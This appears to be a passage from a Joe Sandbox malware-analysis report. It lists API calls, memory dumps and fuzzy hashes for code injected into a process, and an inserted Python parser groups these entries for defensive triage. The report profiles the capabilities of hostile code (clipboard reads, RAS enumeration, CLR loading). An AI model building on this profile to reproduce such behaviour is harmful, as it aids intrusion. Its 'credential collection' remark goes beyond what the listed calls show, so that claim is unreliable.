                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: fd0ea1e3e05611b121a2af79e6f553de557b96421380fa35731233895c097bec
                                                                      • Instruction ID: d74654174a2e2c655e34ac137a94b177bdfba2492dba18570ff6815bbed35265
                                                                      • Opcode Fuzzy Hash: fd0ea1e3e05611b121a2af79e6f553de557b96421380fa35731233895c097bec
                                                                      • Instruction Fuzzy Hash: 74018071604244DFDB11CF29D984756FBD4EF04220F08D4AADE09CB796E674E444CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E030BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 0a73d33be7d84a5b38bf9e110333f9cb7a9d7d26f7f7ecfc46137c71892c6f64
                                                                      • Instruction ID: 7349efb3a2f795d4d47469e31ac56962b17460a9a346fd8b20e56ffce237d1f5
                                                                      • Opcode Fuzzy Hash: 0a73d33be7d84a5b38bf9e110333f9cb7a9d7d26f7f7ecfc46137c71892c6f64
                                                                      • Instruction Fuzzy Hash: 8F018C716052449FEB10CF29D8857A6BB98EB04320F08D0AADD49CB686E675E448CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FormatMessageW.KERNEL32(?,00000E2C,?,?), ref: 04E036B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FormatMessage
                                                                      • String ID:
                                                                      • API String ID: 1306739567-0
                                                                      • Opcode ID: 3ac89a892a16a25a511f69518ef3169372dcae2a632b6fcf3e1c21ab46ced8af
                                                                      • Instruction ID: d913f8a0cd51411a9eef96e9cd133d354d3910769153a9eecf4c7738004ea372
                                                                      • Opcode Fuzzy Hash: 3ac89a892a16a25a511f69518ef3169372dcae2a632b6fcf3e1c21ab46ced8af
                                                                      • Instruction Fuzzy Hash: B4017176500600ABD710DF16DC85F26FBA8FB88B20F14856AED089B741E331B915CBE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04E01596
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      • Opcode ID: 787396bb96ba9cd3e481aeb7eed7728e9bb1c5d625b368a577d8e3393fd58fe7
                                                                      • Instruction ID: 35467df6ebda4795763e3ce5a054888707ebac25b591cbf34866488b88a78776
                                                                      • Opcode Fuzzy Hash: 787396bb96ba9cd3e481aeb7eed7728e9bb1c5d625b368a577d8e3393fd58fe7
                                                                      • Instruction Fuzzy Hash: D9017176500600ABD710DF16DC85F26FBA8FB88B20F14856AED089B741E331B915CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 04E05566
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileModuleName
                                                                      • String ID:
                                                                      • API String ID: 514040917-0
                                                                      • Opcode ID: 63868c5395ac1aeb5d87bcc455e28742f45086b1b4c3375394f501738a2bd695
                                                                      • Instruction ID: 9577966b5b10ad48c08583c4873668a127c828c6b70f8d153cc513de79395708
                                                                      • Opcode Fuzzy Hash: 63868c5395ac1aeb5d87bcc455e28742f45086b1b4c3375394f501738a2bd695
                                                                      • Instruction Fuzzy Hash: E3017176500600ABD710DF16DC85F26FBA8FB88B20F14856AED089B741E331B915CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04E01C11
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      • Opcode ID: be4e0f6928c0e1ca993364ce40a8680b5f06c21af231b013fc9aa9e388026289
                                                                      • Instruction ID: 3ddfc28b0f835a58c3f325db135f9d52fa46c8110913986f70643ab9e8140a67
                                                                      • Opcode Fuzzy Hash: be4e0f6928c0e1ca993364ce40a8680b5f06c21af231b013fc9aa9e388026289
                                                                      • Instruction Fuzzy Hash: 36018075500644DFD720CF59D884B62FBE4EF04724F08D09ADD598B382E272E448CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 04E06D71
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID:
                                                                      • API String ID: 2030045667-0
                                                                      • Opcode ID: 1d0ff75e4c26be20e29109d4ac48ce93d9477d2c906f9fc311003bafd09ff90a
                                                                      • Instruction ID: 6f60d6d7c9c6b5598e878cff5339a5d43f70f10158a101acb3829d267e5a4782
                                                                      • Opcode Fuzzy Hash: 1d0ff75e4c26be20e29109d4ac48ce93d9477d2c906f9fc311003bafd09ff90a
                                                                      • Instruction Fuzzy Hash: 40018C71A00600DFDB20DF25C884B62FBE8EF04324F08D49ADD598B792E275F458CA71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowTextW.USER32(?,?), ref: 04E0253B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID:
                                                                      • API String ID: 530164218-0
                                                                      • Opcode ID: 7977a7d3bf6878861e7980850c271c4a63bb215ff28f477ee1b3e3d6358ab1e8
                                                                      • Instruction ID: 05016dee3c97ef75b140fda7c57f05deff2d9a000a14d8a1ede8b4da1deb3ee3
                                                                      • Opcode Fuzzy Hash: 7977a7d3bf6878861e7980850c271c4a63bb215ff28f477ee1b3e3d6358ab1e8
                                                                      • Instruction Fuzzy Hash: 7D017175A00640DFD720CE19D889766FBD4EF04624F08D0AADE598B791E675E848CA62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,?,?,?), ref: 04E06708
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      • Opcode ID: d52b4da7630ccd821344d3a4a4d1d3223158435e107d7bebe20b63dd7f7d6326
                                                                      • Instruction ID: 8df6e3f158940330fc0d2eab694d2079cf560fc04e157a49a126fd647994ee25
                                                                      • Opcode Fuzzy Hash: d52b4da7630ccd821344d3a4a4d1d3223158435e107d7bebe20b63dd7f7d6326
                                                                      • Instruction Fuzzy Hash: 84019E36500604DFDB218F65D884B66FFA4EF08320F08D4AEDE564A662D271A468DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 04E02282
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionsEnum
                                                                      • String ID:
                                                                      • API String ID: 3832085198-0
                                                                      • Opcode ID: 1e9f3a15446b574166d792360b496086b075196bd28ff5c4a0ed4e8e736200c3
                                                                      • Instruction ID: 5e9cbfe30bdcc92d856ee772ac067eac4d82c7a8ed96882fb0881939c635897f
                                                                      • Opcode Fuzzy Hash: 1e9f3a15446b574166d792360b496086b075196bd28ff5c4a0ed4e8e736200c3
                                                                      • Instruction Fuzzy Hash: EA016D76500600ABD210DF16DC86F26FBA8FB88B20F14816AED085B741E371F916CBE6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04E0162C
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: f2aaddbc1f8b0a7820c67227417777bfa8a24fb1b7c234fa2e60a1aaac423e0a
                                                                      • Instruction ID: 910fc68ff41bacef9fc4de0e8e4a6adf24f72b33cfef9f224c08b08067d10f57
                                                                      • Opcode Fuzzy Hash: f2aaddbc1f8b0a7820c67227417777bfa8a24fb1b7c234fa2e60a1aaac423e0a
                                                                      • Instruction Fuzzy Hash: DF019E71500604DFDB21CF55EC44B56FFA4EF08320F08C8AADE494F256D276A858DF62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • OleGetClipboard.OLE32(?,00000E2C,?,?), ref: 04E00221
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Clipboard
                                                                      • String ID:
                                                                      • API String ID: 220874293-0
                                                                      • Opcode ID: e7d47a989539120ffef1e09544d2a000f15b783528ca6817b4dbafc42302aa7e
                                                                      • Instruction ID: 8988dc5a591cb3da23cafa9c6da3b6be7e77a5d23b7191f3e1159b4e83633817
                                                                      • Opcode Fuzzy Hash: e7d47a989539120ffef1e09544d2a000f15b783528ca6817b4dbafc42302aa7e
                                                                      • Instruction Fuzzy Hash: 1B016D76500600ABD610DF16DC86F26FBA8FB88B20F14815AED085B741E375F916CBE6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04E06651
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 20267bb6ba7963989a6c3b2c1f6be794aedb64dc2cb8b56d687ac7b8653b3a66
                                                                      • Instruction ID: 9d73e07e196841fcf4240469d85b28bbed4272f1980b96594482ab1bf3df2e5e
                                                                      • Opcode Fuzzy Hash: 20267bb6ba7963989a6c3b2c1f6be794aedb64dc2cb8b56d687ac7b8653b3a66
                                                                      • Instruction Fuzzy Hash: F001D431500604DFDB208F25E844B66FFA0EF08320F08C4AEDD494B751D271E468DF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E02E93
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 5fca3528baa712f7cc385af27fee51d82ace62a8a69e880f99a44511a47084dc
                                                                      • Instruction ID: 5a841176a89678f92c4eaca91e0648a69e7bcf72f50b5426158215dc62ee9aa5
                                                                      • Opcode Fuzzy Hash: 5fca3528baa712f7cc385af27fee51d82ace62a8a69e880f99a44511a47084dc
                                                                      • Instruction Fuzzy Hash: EA01A235500644DFD7118F59D888756FFE4EF04320F18D0AADE494B792D275B849DB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindClose.KERNEL32(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E02FF0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CloseFind
                                                                      • String ID:
                                                                      • API String ID: 1863332320-0
                                                                      • Opcode ID: 723de66dcf174fe34c5a8211aee9c930cad539cc38fab6e819e5e0236822168d
                                                                      • Instruction ID: 5cd5c718271e8dad4efcb3c823254fe1a4bfe1442d4c421ddf08c2feaa6810c7
                                                                      • Opcode Fuzzy Hash: 723de66dcf174fe34c5a8211aee9c930cad539cc38fab6e819e5e0236822168d
                                                                      • Instruction Fuzzy Hash: AC01D135600644DFDB108F19D884766FFD4EF04320F08D0AADE099B796D6B5E848DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E065A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 3e07a217b31027934d5c95c31a14cc6fa6b7ce1f27aa2d931c4c49029e096bfe
                                                                      • Instruction ID: d0a7e3566a9f33e359138c870e50fda45059fb11e50a5ae70e66c52c50c50ffa
                                                                      • Opcode Fuzzy Hash: 3e07a217b31027934d5c95c31a14cc6fa6b7ce1f27aa2d931c4c49029e096bfe
                                                                      • Instruction Fuzzy Hash: 29012131A00604CFCB208F29D884752FFA4EF14220F08D0AADD4A8B386D6B0E458CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(?,?,?,?), ref: 04E02A5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 8138360d1d9c6fb1f3169f6e2be26b2826f3febd537c3c9b3a8bb8926fcad108
                                                                      • Instruction ID: 749ba5b61efbeae90fb87489d098ae8f7094540d81db7f176d50ff7ca520ed95
                                                                      • Opcode Fuzzy Hash: 8138360d1d9c6fb1f3169f6e2be26b2826f3febd537c3c9b3a8bb8926fcad108
                                                                      • Instruction Fuzzy Hash: 84018B31500644DFDB208F55D888B66FFE0EF08320F08D09ADE990B352D6B5A858DBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DispatchMessageW.USER32(?), ref: 04E06868
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DispatchMessage
                                                                      • String ID:
                                                                      • API String ID: 2061451462-0
                                                                      • Opcode ID: f9ad6ba674b26db647c1192ab59680f2d9988712a8a2e88e3b006f4b2b789468
                                                                      • Instruction ID: bb760001db4472f7c9d7c334f1a1c8757bc6e5cbf4188a464fa3e3203e4ac284
                                                                      • Opcode Fuzzy Hash: f9ad6ba674b26db647c1192ab59680f2d9988712a8a2e88e3b006f4b2b789468
                                                                      • Instruction Fuzzy Hash: 65F0AF34904644DFDB208F25D885762FFA4EF04320F18D09ADD495F352D2B5B558DAB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
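
The blocks above are Joe Sandbox's per-function metadata for process 8: each names an imported API that the disassembler resolved, the memory dump it was recovered from (the 04E00000 region is not backed by a PE image, so it is code that was written into the process rather than loaded from disk), and a fuzzy hash over the instruction bytes. Read one at a time they say little; aggregated per dump they give the capability profile of the injected code (file mapping, clipboard access, RAS connection enumeration, CLR loading through mscoree) and show that many of the stubs are byte-for-byte near-identical, differing only in the target they call. The Python below is added here as an example and is not part of the report or of any Joe Sandbox tooling: it parses a trimmed excerpt of these blocks (constructed from the lines above, reduced to the fields the parser actually reads), groups API references by dump source, tags them with behaviour labels chosen for this example, and pairs blocks whose Instruction Fuzzy Hash differs in only a few hex digits. The hash comparison is a plain positional digit count, not the sandbox's own similarity metric.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt of the function blocks above, reduced to the fields this parser uses.
SAMPLE = """\
APIs
• CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04E01596
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: CreateFileMapping
• Instruction Fuzzy Hash: D9017176500600ABD710DF16DC85F26FBA8FB88B20F14856AED089B741E331B915CBA5
Uniqueness Score: -1.00%
APIs
• K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 04E05566
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
• Instruction Fuzzy Hash: E3017176500600ABD710DF16DC85F26FBA8FB88B20F14856AED089B741E331B915CBA5
Uniqueness Score: -1.00%
APIs
• OleGetClipboard.OLE32(?,00000E2C,?,?), ref: 04E00221
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
• Instruction Fuzzy Hash: 1B016D76500600ABD610DF16DC86F26FBA8FB88B20F14815AED085B741E375F916CBE6
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000008.00000002.311981748.0000000000CD4000.00000040.00000040.sdmp, Offset: 00CD4000, based on PE: false
• Instruction Fuzzy Hash: BF41E33554E3C09FC3078B3098A1A51BFB0AF47214F1E81DBD584CF2A3C229990ADB62
Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)", re.I)
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[\d.]+)%")

# Behaviour labels for the APIs the report lists; these assignments are this example's own reading.
CAPABILITIES = {
    "CreateFileMapping": "file mapping / shared memory",
    "MapViewOfFile": "file mapping / shared memory",
    "OleGetClipboard": "clipboard read",
    "RasEnumConnections": "RAS connection enumeration",
    "K32GetModuleFileNameEx": "module path lookup in a process",
    "LoadLibraryShim": "CLR host loading (mscoree)",
}

@dataclass
class ApiRef:
    name: str      # e.g. CreateFileMappingW
    module: str    # e.g. KERNELBASE
    args: list     # argument placeholders as printed by the sandbox
    ref: int       # address of the call site

@dataclass
class FunctionBlock:
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    uniqueness: Optional[float] = None
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # remaining "• Key: value" lines

def parse_blocks(text):
    """Split report text into FunctionBlocks; the 'Uniqueness Score' line closes each block."""
    blocks, cur = [], FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := SCORE_RE.match(line):
            cur.uniqueness = float(m.group(1))
            blocks.append(cur)
            cur = FunctionBlock()
        elif m := API_RE.match(line):
            name, module, args, ref = m.groups()
            cur.apis.append(ApiRef(name, module, args.split(",") if args else [], int(ref, 16)))
        elif m := SRC_RE.search(line):
            cur.source_file, cur.offset = m.group(1), int(m.group(2), 16)
            cur.based_on_pe = m.group(3).lower() == "true"
        elif m := FIELD_RE.match(line):
            cur.fields[m.group(1).strip()] = m.group(2).strip()
        # bare section headers (APIs, Similarity, ...) carry no data and are skipped
    return blocks

def base_name(api_name):
    """Drop the ANSI/Unicode suffix (MessageBoxW -> MessageBox); heuristic, leaves OleGetClipboard intact."""
    if len(api_name) > 1 and api_name[-1] in "AW" and api_name[-2].islower():
        return api_name[:-1]
    return api_name

def summarize(blocks):
    """Per memory dump: how many blocks, how many without a resolved API, and the implied capabilities."""
    out = {}
    for b in blocks:
        s = out.setdefault(b.source_file, {"blocks": 0, "without_api": 0, "apis": set(), "capabilities": set()})
        s["blocks"] += 1
        if not b.apis:
            s["without_api"] += 1
        for a in b.apis:
            s["apis"].add(a.name)
            if cap := CAPABILITIES.get(base_name(a.name)):
                s["capabilities"].add(cap)
    return out

def hex_distance(a, b):
    """Count of differing positions between two equal-length hex strings (inf when lengths differ)."""
    return sum(x != y for x, y in zip(a, b)) if len(a) == len(b) else float("inf")

def near_duplicate_stubs(blocks, max_diff=4):
    """Index pairs whose Instruction Fuzzy Hash differs in at most max_diff digits. Many such pairs in
    one dump points to generated thunks that differ only in their call target, not to distinct logic."""
    pairs = []
    for i in range(len(blocks)):
        for j in range(i + 1, len(blocks)):
            h1 = blocks[i].fields.get("Instruction Fuzzy Hash", "")
            h2 = blocks[j].fields.get("Instruction Fuzzy Hash", "")
            if h1 and h2 and (d := hex_distance(h1, h2)) <= max_diff:
                pairs.append((i, j, d))
    return pairs

if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for src, s in summarize(parsed).items():
        print(src, s["blocks"], "blocks,", s["without_api"], "without API;", sorted(s["capabilities"]))
    print("near-duplicate stubs:", near_duplicate_stubs(parsed))
```

Run against the full report rather than the excerpt, the per-dump summary is the quickest way to see which injected region carries the credential and clipboard collection versus plain GUI plumbing (the USER32 message-loop calls), and the near-duplicate pairing separates the handful of distinct routines from the many stubs the sandbox lists as separate functions.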

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311981748.0000000000CD4000.00000040.00000040.sdmp, Offset: 00CD4000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 66572be4d4fe86657e674e98ced36dc45ac4e96e23f654889e83a028bb7eba5f
                                                                      • Instruction ID: 9b7f947620aad3d7c1fcef4beab804ddc51ddd77582da2354c776ba24ad8b776
                                                                      • Opcode Fuzzy Hash: 66572be4d4fe86657e674e98ced36dc45ac4e96e23f654889e83a028bb7eba5f
                                                                      • Instruction Fuzzy Hash: BF41E33554E3C09FC3078B3098A1A51BFB0AF47214F1E81DBD584CF2A3C229990ADB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ad62f125ff175d04df463ca3d665e36bbe4b0c15ffc963d2d40b4488c39b1ff
                                                                      • Instruction ID: 62ccbf729d6d6cb9876cc93ecc9a561d85f7751103b86e106ef698a5c85c12cc
                                                                      • Opcode Fuzzy Hash: 7ad62f125ff175d04df463ca3d665e36bbe4b0c15ffc963d2d40b4488c39b1ff
                                                                      • Instruction Fuzzy Hash: 3E11BAB5508301AFD340CF19D880A5BFBE4FB8C664F14896EF998D7311E271EA048FA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39e0dcfa3aa3ad50bf5b1ed0a6addd23acc91ff652c93ff19f6b0fc19839ced7
                                                                      • Instruction ID: 941d22dfc0425c16a4ef662a8ef9fba7a1593a4f33aeed650297bc7ed3dafb49
                                                                      • Opcode Fuzzy Hash: 39e0dcfa3aa3ad50bf5b1ed0a6addd23acc91ff652c93ff19f6b0fc19839ced7
                                                                      • Instruction Fuzzy Hash: 4B11A234204244EFD715CB28C984B26BB95AB88708F34C5AEEA491B793C777E803DE51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311981748.0000000000CD4000.00000040.00000040.sdmp, Offset: 00CD4000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a793826526fd600a8b20557789d59322b9537799205f3c2c922971235afd55e
                                                                      • Instruction ID: f7ed2844fba595ba080956c5c05dcb1d8d9a69b5b5cb0e46c1b97df8f3884bed
                                                                      • Opcode Fuzzy Hash: 2a793826526fd600a8b20557789d59322b9537799205f3c2c922971235afd55e
                                                                      • Instruction Fuzzy Hash: E211D3302043C0DFD719DB14D980B26BB95AB94708F28C5AEEB499B782C77BC803DA51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2e44789835691d82ee7e9d437cad0f7636c71dd6a375dcf72a394733833db718
                                                                      • Instruction ID: 188e59006be03013105f4967fb7c82c319f9100c80976abcbb7e56198c54e5ef
                                                                      • Opcode Fuzzy Hash: 2e44789835691d82ee7e9d437cad0f7636c71dd6a375dcf72a394733833db718
                                                                      • Instruction Fuzzy Hash: 98214A3410D3C09FC7038B20C854B55BFB1AB47304F2A85DFD9899F6A3C23A9806DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1ce9a51b580787b5b2a818d772d4b5d1f40a118a01be1563b6ea5a8bf057327
                                                                      • Instruction ID: c33af0f51217711127df217d5642ae7cee0121d7fa8ce08cba27b5d2f0bec81e
                                                                      • Opcode Fuzzy Hash: b1ce9a51b580787b5b2a818d772d4b5d1f40a118a01be1563b6ea5a8bf057327
                                                                      • Instruction Fuzzy Hash: CA216D355097C49FC706CB24C890B15BFB1AB46308F2986DFD9889B6A3C33AD906DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311863165.0000000000CA2000.00000040.00000001.sdmp, Offset: 00CA2000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311981748.0000000000CD4000.00000040.00000040.sdmp, Offset: 00CD4000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
